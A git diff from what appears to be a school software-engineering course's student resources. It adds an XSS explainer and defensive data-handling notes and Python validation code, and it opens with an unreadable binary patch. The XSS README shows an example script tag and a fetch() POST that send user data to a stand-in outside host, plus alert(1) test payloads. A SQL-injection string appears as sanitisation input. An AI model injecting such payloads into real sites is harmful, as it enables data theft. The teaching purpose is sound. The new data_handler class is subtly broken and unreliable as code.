zUns^m6L^OK`2r$Z$0<M4hcNb&MR@1Do_l(i6#>&w%dRUlunUfEW-QTMN|_?bQot8C
z5Bz$Eaf&g?w-g1kFR7u1IkRaO%)y0W4(|z53?GI%a@YmTOc7MJ2^^o39>a)TPS?hl
z4Fn_P@664f%b_?U{rQUKq##j;AC!j?md{6yNoF#7RJ&6-b~-yE8CLi%I^|LA06EOJ
zmDG_C(1ta+w`TCR$c%MfaUECBou{T<02+{c;smB&)SZtHxbCer>H}!sQn*hdBdIli
zqR>z~^>7^^&d9J}mI$;b8gA$o|1h1d3f~>8Gl^*GRUS@{=B^8EiQ&knb_-M)69A0h
zxkC<Icc{|>CC(A@yl*Hp)r|AMhs%G7oc}W1koPKTuOpq)J=tfRS<ur`m?g7V%Jv7M
z#Vqz<n~thE9?$87`=xW5ZY`zGgHk~n<#X+Lz74Q-My@HB(=`gOA|**s+ou)W#yVLL
z?Ao9v<8=Tu&NlK+cGnt42U33PD^SuJhPIRz)FsGb?yos_8eo1w7JLu3m)~AFT+65m
zuN$j1QKO8Z<tO2REVXx9Ts}SB(>;v4@cJNL!k2YNiWVsz9jkz~zfk&sGC~picRei@
z=^MOki{Y>)l;&|@XFO*M<SGm1OGMeZCGabKlV$o&1=Yfz2SrGlnijC*#IJ@w@a?Jo
zXlcxFG-g;>dJ*hNmt&cc-Hf{5(4Rd7<oo%&OkEb38<HO_P@S-xk|!*{Ai%|cjnIDc
z&KjXHVA>Wn;=Z7V9(-nEDL)0RuXF(vfK+BFofP%3@yRu88|EC=$(bMJz-=D5zb!#`
zd+&QoIPYzPwGh(1pMuJ>9#@;1>|kj^y%2TNM9dc~wyf&WVFvK|%_R|83&P9^<tdB0
zr)jGpj+3JKOU$_?{6GgZ`F>`7G-3`cMa8*9TqEWVM>MT-_pf_<k*|N@{uQYkUH;Mh
zv2i4)m&9x<h7ypeOr8QqHd`I*bLK5vEG=u69#QPemHAE=v(L1w9K4S6VFUAM7s$e0
z&JW6WjY1wI4yOAsS53I+{lJzx=|p^4GX7xZ0U0uEkE<Q1P>-%3FW8EvW^cNNWY8DQ
z9vKVbKr$o@VU<%mMb+hbv$N}?2N`*tGd@Bd<qwMV6}(PjNwZapNd&Z01K7az4yUB6
zbNn&XaYQ^@DeO)>z|^}3i+ArvQ?n|6IGy1JTXZ6$@1+k((E25n8B?T|X&neaH{#bW
zV_&~1z<zyQ0C$v<!CNK*A9j%hP5p@Q9_=Do(fA5PAifHBlCk(z;~DUqt*F&hy-*9$
zANYA%$a7b#>PJQ>yt5^L5&NV^>XzBPUrpp_e~PwxyaxbG<Yw5d$m2fLob((mIBVkI
z6+%Ou)5TP38|BB+Cb!d*Vby0Xkl-xbR}jRb73vcryQ-%KQ6ETVT+;Xv?aRjxaO?oI
z{T@;{aJ7`q;XWg4&TDA_>|}q!?(){%d6#~JeT^hP4beuSWdc~eBA?C&Q$Zc3LR#7}
z$|fScuLP&CfW>z~ifzjGS~zm?YH~2mVxS0ZvbkTlXOS=x^7<homkE&ergwiGC)O-J
zEtB%AfKgs20Q9}@_ImS;ew?<pU5?Iyd0L;(gAw20kwVQeJ9~eCQu-5MTh;Pacqf-j
z25)AfR$Z~wtw}MblQ*jHT>dI}HICBx*EtiST-^ZWt^4Lb(upy%6nne4OI2md=|lNS
z1k7P#GX<rmjPgydFb?YyNKxhOY|eE)8x)<n_+}GZeZpVZo+WG1JHtN6?sQ?O2M9Ye
zR}4Z)a1R!TMLF*D7EWk68L72CF$<#9l8{jWl%PF|*c*Jtrm{;i<8#D^X#?-_6#++h
z37-b27nwUX+h1{0wZe`(lFjukb{qbEyEnDR&*EnE>tuW8k*wXi+KK#v5DB2}mzaH(
zg3IPm&*iN>Qk1#DnWdZkRb?tsUM3<%w>^ah)L!~<Z{>*yH0$kA3rus6eqkv}1bQ$a
zEt1!Syh6>noCgWXj$9mmu$ZmCi6v`Wb=a@~O!+N+7vz!g^WMHe3G#*YfO+7PDb<i(
z5hzhp1aH=xY~?JAMQx8Oj~ZnGuc5n|+Kjp)z_xDt@Z5~v#|s$Z=sEXSv`IKzR%$ar
zau)!h`%^Fn#!HAZaPh5^)TPM{0pU-?vYkYILDeHb2)Uk$7EE^Hqki#nP5>N%f;2L_
z-hgwz6G;Jr5#s3|8U>lhgD@lPR<%FH$+yF$8+PLA%Rs~te)8DkEbP4CZX~CFJ&Ud0
z@yA9e%#)^{;~1ECD9v@z@c^J^fyBCz!pplGj1`+RsL7<~jsrcW&f8`FuBiT*F#F@i
z<U8S8jkv4hiD&Dj$}2}xq|OWEk?8<m?9q#$*NlgP7|kGuK{&ixr{8CG6Z@PJau&9>
zM!jk3=Oxui^o{xiOtg7>Moyv4<06NxmVuzE$S;*j*R*OIj55<bgxxIHIIx#Q0<1)T
z4D<LyA2*z{t|ys7X3}>HA}V_mZWQA4Y%0J$z;%*1A#jGAq-_0^W3pAN?B#tM(uY!t
zC2NI&cR8I103YrY(PIuA-Tm^?Nd7<)-}&uV7{adFtrDmV0FT(p;F5H0MDwcm^V3hN
z3wA{+v+&yc4nLC#6<<3MgaI8We*x?6>i2YdC-qgiCbYfpcwb3TBSI1%YHHg8E)-2W
z@6v1kK>D0ZS_-Z21w+-~*NZA#CJw->%zIT9v18wifUI*oM5!iOn+y09L+2p>c1Q-I
zB;x+<_%=Iu%jWg7+35O#IxQWVvAFs>Vfp7zokuW}u^v!&0&r3l1f_7-JVz8gDg<mp
znbCx#Y2bnjQnEh@1|)Yt^>pT)M^~KFy6hh9B^igE&WKmx-CZt;JU)nAeQEaUrXev&
zQ&R6&>~123FIHZ?6s=!XdLYVWVgs-Qu);JZ+{>yYu-Q7Q7;5qL2EahY`^eP}`kv!8
za;^4>wwhB$?N6mq?%qx0E<2`{`0%q^=QjV~%%kO}NkB_!E1giU!hJ%Tdg<kt@ijzZ
zf3RSw`|3k%u3&;Fu!SSN{Nr+W@(9m?-WQYXf<Le;2VM7niIkh%DE5Dz|L8Q|)Vje-
zxET&QOzWlXZAsN{UjwmZ9oIfnV#yBC?fYE4Pp&of%fj#-pl*sM5z3Qg=(Z0GYwUdF
zkM}JThA@ydLx#eLv3U#WN?2i{+iIgR(di)~$}!M9gP1vJ&nE<m;`=EC9X|zMJm6m#
zdQ4fg2au9~!Y4OS!IsjXJ1e02_4et9#_us}n3!kF_XZc~=M3Wk81t@(0+_=*;BKD+
zI;iTuy?kxT;Z$p0S6IkQEZ<(x_A=rQ1o*y?JA)&oT9<~lZ@2r-yT$(XR{3{<sX&5J
z^Zr=MsR|hb<UqPI#k0qBy6v&R6{dD=5^t=&g=RCT`s+7r_Q6;7mb;NW5oO-Iz~N?M
zn^U55g@&n+Ii)_jG)1rdgFn=_fk$JN-!~ZY*>TD&+gkeNs8$S+#z_1EZhf9qo5oLh
zWHrD+A|6WMk<yu+cEUFO@LkcY{hS=P^RPz;Mt?p3hj8EB+Di=?OXv{E4bn1`eivFS
zX+BL1(8HPaNNH|z<nRS8)gCmGr@bdRivwCq7r_>Apv(KD$p;nL1iKHUHSR#EahBF_
zoq`u6;c_=00f`dO%50hg$%jH#(_f4m{bT`>%F~2MhXoUim0*5?GV-KjFA(k<B&MU0
z!^Rlx{?gs)Qn6NoE|2kVrEqk2doMV5zQOo6KB0G~<gM8ma*@z+3Vru{8FdvBLK#D#
z0i=TF8GXCOL&Z;%9-;+zI-JhAC{3ANPIwI*y2tyHn=QVANYXV#;}tDcz+UmM3HGs!
z$74S*84d^Q39_HH+zn4!uI^tFF>pstQv(gFYIi%qofLpl|6sq67Ux^Y+JCBt{#T6?
zvqYe6AF9o7qKQx4Le97UO{Q6N5$z_Yv-K7#V@YD`r>9TZC;VA8XxLtG+}sHCPzT6K
znudPbe7(5kcezqar&cq#maPh3>vAbK<TRh>rx|r6ID$bQYAV$5ZhXMPL&kx&C@I*Y
z`oI#3t0$}gYK0;PNpO#5%Umkvs=&aDtWz{3P?hLlUT*F-*YJ>|vOzy0ho6u6aW7py
zMFed;VH|FCI&3lmYVhui8`?`b^MvaJf?&P8$@a+ix>xd#@5=$F%;XedcCq^e{pN+0
zt1+gWF@;Z1u*N5MzA@**1y3~Pn-i0IPtTGq;JRt1^)w8P(4l{M(&hf1pqL(OeDYMi
zuNzYZ;7HLg6faStn@`KIryVFIw%}oP;KI+sWa8p&!ae(PRYu}CPz6y)TJ!Jj?WMb5
zA)dDuhH`}wl)Z{`hBRP{qH<7{{*Ao&fl?-PFp70nP;CP6k5~vQIP#M$%ltKoALPKd
z+;TRCqF{@#eXdH{N-{q#B%h%}aPmIt=&`iMEifRMS7WFj=rXi#f{#juc+?tc8^w`G
z<pq(0ZjF14X^{3}K1xui6n>O&glU9&MA*T=5EMc@u9k^(1M6Kk(V_6F{Vq72Iets?
z>$T04=KuKnivWL9t}|<3l;E4vIWDQaZk%yi!iQdi0G;l9gKBS;F%8J?s(V)J!gf+<
zctQ<N26v6O!$(4fh1mn8$kjcdYps=MH-+8xtucH^0?kQX91X7{CCsQXiO7$419}S?
zW<@Gsk-n~N;LflEfXO$gWZxLY!po6)R2Mz~{RbfAPmv;k7J5R!dNAgm3J!vTjPczH
z69#a0u)7%qtd4n9TCH{9jVz$m{#BiwF%xZBIE#57Iov|)ck5Sy=2Fp18i%Tvhe7=h
zUonsbGy;*mJJoHdIlr+?Kd60#Z?nmYa0=eWEb&HJXxIUbqpi4~P5-UE?7)L-2P=lw
zL50E11GV4PzPbq@vw#)v{~FaN&_PcymZ%#Jmr({0H4ysw#4N9qD)u|xavm__H_dmw
zS}s`zblJp0Wl4^hM}km-y~I5vJ%npaIjmX}HA)-W)7Pw@fDZkcHj0v!fKLa3PqXcl
zl}Y`;J6SI)dhpnb`o4)FWYPI+_vl7^4hO?o!GYaJ#An}inbIy0I1pB_c<?0<Z4gwF
zim<Pp0AE!75ZiY3Q*bj`<KT+P=e)=L*@Oq&%EUr!Niv?&Or^y+OaE1>$&iO6z;|5z
zwreA=FMERe+d$NNz^J`R0_x4lTZkM=bexB?!Ms4b!HHsft&wDev_Twz3z)Z=j=^Yn
z(!KBk?!_#~SI)IaolgHK!BnIAJ?LHpP;9&6=r<^)GaAX`2kuJ|KBms-9nWgKasi{f
z-o}JV1y>N3_nJS+U-Ki{XA{17<C9q=<M$7u5AVPGAj)@<AePG>8%H_%EZ_1Op&(%o
zK@W(fbnMSh9xf0a-ew}`WxojZyHaVH_+01uWJQFoO*v1`Lq~)V`Ke4!e?T-X=B1Tz
ndL6`7L<(H}{QqS*eFB>HteWR5by+<98L`$aJ+*Qb>j(b>N53`A

diff --git a/.studentResources/XXS_scripts/README.md b/.studentResources/XXS_scripts/README.md
index fa8677f..30524f0 100644
--- a/.studentResources/XXS_scripts/README.md
+++ b/.studentResources/XXS_scripts/README.md
@@ -1,7 +1,53 @@
-# XXS Testing scripts
-To use these scripts paste them into input boxes and see what gets executed or saved in the HTML
+# XXS - Cross Site Scripting
+
+Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
+
+## Software Engineeringing Course Specifications
+
+_"Cross-site scripting (XSS) involves injecting malicious code into an otherwise safe website. It is usually done through user input that is not sufficiently sanitised before being processed and stored on the server._  
+_Students should be able to interpret fragments of JavaScript related to cross-site scripting."_
+
+Either an internal threat actor has intentionally or unintentionally inserted the malicious code into the code base or SQL/XXS vulnerability has been expoited to insert the malicious code into the code base. Students should be able to identify that a unknown script has been executed or that a POST request has been made to an unknown URL.
+
+```html
+    <HTML>
+        <HEAD>
+            <TITLE>Welcome to yourWebsite</TITLE>
+            <link href="http://yourwebsite.com/favicon.png" />
+        </HEAD>
+        <BODY>
+            <H1>Your Website</H1>
+        <SCRIPT src="http://www.randomUrl.com/danger.js"></SCRIPT>
+
+        or
+
+        <SCRIPT>
+            const response = fetch("http://www.randomUrl.com", {
+                method: 'POST', 
+                headers: {
+                'Content-Type': 'application/json; charset=UTF-8',
+                },
+            body: JSON.stringify(yourData),
+            });
+        </SCRIPT>
+        </BODY>
+    </HTML>
+```
+
+## Non-destructive XXS Test Scripts
+
+To use these scripts paste them into any input boxes and see what gets executed or saved in the HTML.
 
 1. `<script>alert(1)</script>`
 2. `<img src=x onload(alert(1))>`
 3. `<svg onload=alert(1)>`
-4. `<iframe src=”javascript:alert(1)”></iframe>`
\ No newline at end of file
+4. `<iframe src=”javascript:alert(1)”></iframe>`
+
+## How to secure against this attack
+
+1. Regular code reviews
+2. Only known and secure 3rd party javascript libries should be externally linked. Preferably 3rd party libraries should be locally served after a code review.
+3. Defensive data handling
+4. Declare the language `<html lang="en">`
+5. Delare charset `<meta charset="utf-8">`
+6. Content Security Policy (CSP) Blocking `<SVG>` and `<SCRIPT>` tags.
\ No newline at end of file
diff --git a/.studentResources/data_sanatising/data_handler.py b/.studentResources/data_sanatising/data_handler.py
deleted file mode 100644
index c6ad742..0000000
--- a/.studentResources/data_sanatising/data_handler.py
+++ /dev/null
@@ -1,39 +0,0 @@
-##############################################
-# RE = RegExr = Regular Expressions          #
-# Read the documentation and tutorials       #
-# https://docs.python.org/3/library/re.html  #
-# https://docs.python.org/3/howto/regex.html #
-##############################################
-
-import re
-import html
-import bcrypt
-
-def check_password(password):
-    if len(password) < 10:
-        return False
-    if len(password) > 20:
-        return False
-    if re.search(r'[ ]', password):
-        return False
-    if not re.search(r'[A-Z]', password):
-        return False
-    if not re.search(r'[a-z]', password):
-        return False
-    if not re.search(r'[0-9]', password):
-        return False
-    if not re.search(r'[@#$%^&*()+|~-=`{}:”;,./]', password):
-        return False
-    return True
-
-def make_web_safe(string):
-    return html.escape(string)
-
-def check_email(email):
-    if re.fullmatch(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)",email):
-        return True
-    else:
-        return False
-
-def salt_and_hash(password):
-    # to be implemented
\ No newline at end of file
diff --git a/.studentResources/defensive_data_handling/README.md b/.studentResources/defensive_data_handling/README.md
new file mode 100644
index 0000000..d6ed64e
--- /dev/null
+++ b/.studentResources/defensive_data_handling/README.md
@@ -0,0 +1,25 @@
+# Defensive Data Handling
+
+## Input validation
+
+Input validation is a security control where input is checked to be valid data. It is best practice to validate data on entry to the application before it is stored or processed. If data is not valid it should be discarded and UI feedback provided to the user.
+
+- Frontend data validation with [form field attributes](..\secure_form_attributes/README.md).
+- Backend data validation with [regular expressions and REGEXR](data_handler.py)
+
+## Data sanitisation
+
+Data sanitisation is where data is 'santised' or cleaned for processing or storing. This is the process of replacing any potentially malicious characacters with non processing codes so the text will render as expected but no prcoessing will occur. For example the malicious string **`"';DROP TABLE users"`** when santitised will be stored as **\&#39;\&#59;DROP TABLE users** but will be render as **`&#39;&#59;DROP TABLE users'**.
+
+### Data sanatisation methods
+
+- Best practice is to make all strings web safe before storing or processing them using a library like [html](https://docs.python.org/3/library/html.html).
+- Content loaded from a JSON file is loaded after all JavaScript has been executed so any malicious code in a JSON will never be executed by the browser.*
+- Jinga2 (built into Flask) converts all strings into web safe strings before rendering on the front-end.*
+
+    \* _These measures are reactive but are still recomended as best pratice in case malicious code still manages to bypass all defensive measures._
+
+## Error Handling
+
+Error handling (alse called exception catching) is essential in defensive data handing as a malicious user may attempt to exploit the application by providing it with invalid input to attempt to trigger an vulnerability. Students should be familiar with [Python exception handling](https://docs.python.org/3/tutorial/errors.html) specifically the [try](https://docs.python.org/3/reference/compound_stmts.html#try) statement.
+
diff --git a/.studentResources/defensive_data_handling/data_handler.py b/.studentResources/defensive_data_handling/data_handler.py
new file mode 100644
index 0000000..e8ff483
--- /dev/null
+++ b/.studentResources/defensive_data_handling/data_handler.py
@@ -0,0 +1,56 @@
+##############################################
+# RE = RegExr = Regular Expressions          #
+# Read the documentation and tutorials       #
+# https://docs.python.org/3/library/re.html  #
+# https://docs.python.org/3/howto/regex.html #
+##############################################
+
+import re
+import html
+import bcrypt
+
+class data_handler: 
+
+    def __init__(self): 
+        pass
+
+    def check_password(self, password: str) -> bool: 
+        if len(password) < 10:
+            return False
+        if len(password) > 20:
+            return False
+        if re.search(r'[ ]', password):
+            return False
+        if not re.search(r'[A-Z]', password):
+            return False
+        if not re.search(r'[a-z]', password):
+            return False
+        if not re.search(r'[0-9]', password):
+            return False
+        if not re.search(r'[@#$%^&*()+|~-=`{}:”;,./]', password):
+            return False
+        return True
+
+    def make_web_safe(self, string: str) -> str: 
+        return html.escape(string)
+
+    def check_email(self, email: str) -> bool: 
+        if re.fullmatch(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)",email):
+            return True
+        else:
+            return False
+
+    def validate_name(self, name: str) -> bool: 
+        #Check if the name is valid (only alphabets allowed).
+        if not name.isalpha(): 
+            return False 
+        return True 
+
+    def validate_name(self, number: Double) -> bool: 
+        #Check if the name is valid (only alphabets allowed).
+        if number.isalpha(): 
+            return False 
+        return True 
+
+    def salt_and_hash(password):
+        # to be implemented
\ No newline at end of file
diff --git a/.studentResources/data_sanatising/main.py b/.studentResources/defensive_data_handling/main.py
similarity index 100%
rename from .studentResources/data_sanatising/main.py
rename to .studentResources/defensive_data_handling/main.py
diff --git a/.studentResources/safe_API/README.md b/.studentResources/safe_API/README.md
index 1a71de9..e61d8db 100644
--- a/.studentResources/safe_API/README.md
+++ b/.studentResources/safe_API/README.md
@@ -1,4 +1,9 @@
-# Safe API
+# API
+
+API is the acronym for application programming interface — a software intermediary that allows two applications to talk to each other. APIs are an accessible way to extract and share data within and across organizations.
+
+> [!NOTE]
+> The [W3C defines API's as best pratice](https://www.w3.org/TR/dwbp/#accessAPIs) in making data available.
 
 This example safe API is a basic implementaion for a random movie generator. The API will randomly select a film for it's database and return it as a JSON. A API arguement call can return if the movie was liked or disliked. A new movie can also be added to the databse through the POST method with a JSON file to the API.